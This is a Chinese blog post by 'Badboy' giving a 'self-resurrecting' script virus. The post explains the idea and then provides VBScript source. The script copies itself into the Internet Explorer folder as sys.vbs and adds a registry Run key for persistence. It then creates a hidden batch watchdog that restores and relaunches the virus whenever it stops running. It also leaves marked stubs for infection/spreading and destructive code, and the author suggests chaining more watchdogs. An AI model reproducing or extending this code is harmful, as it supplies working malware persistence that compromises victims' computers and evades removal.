最簡單的腳本病毒自我復活思路————【Badboy】

首先判斷是否是第一次運行,如果是第一次運行就把自己複製進ie目錄,並且加入啓動項,結束。

下一次開機運行後。創建一個批處理監控程序,作用是備份病毒的代碼、監控病毒是否正常運行,若沒有運行,就用備份的代碼創建一個新病毒並運行。

非常傻得一個東西、報毒是肯定的,因爲往註冊表添加啓動項了。只是一個簡單的病毒思想嘛,按照這個原理,可以繼續創建第二個監控程序,監控第一個監控程序的運行,甚至更多。

大牛莫笑

On Error Resume Next
set xfso=createobject("scripting.filesystemobject")
set xwsh=createobject("wscript.shell")
if xfso.fileexists("C:\Program Files\Internet Explorer\sys.vbs")=false then
    xfso.copyfile wscript.scriptfullname,"C:\Program Files\Internet Explorer\sys.vbs",true
    xwsh.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\open","C:\Program Files\Internet Explorer\sys.vbs"
    wscript.quit
end if
set x1=xfso.opentextfile("C:\Program Files\Internet Explorer\ie.bat",2,true)
x1.writeline "@echo off"
x1.writeline "type sys.vbs > system.txt"
x1.writeline ":loop"
x1.writeline "tasklist | find /i " & chr(34) & "wscript.exe" & chr(34) & "||goto :a"
x1.writeline "ping -n 5 127.1>nul"
x1.writeline "goto :loop"
x1.writeline ":a"
x1.writeline "type system.txt > sys.vbs"
x1.writeline "sys.vbs"
x1.writeline "ping -n 5 127.1>nul"
x1.writeline "goto :loop"
x1.close
xwsh.run "ie.bat",0
copy()
dead()
xwsh.run "sys.vbs"

function copy()
'感染和傳播代碼
end function

function dead()
'破壞代碼
end function
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章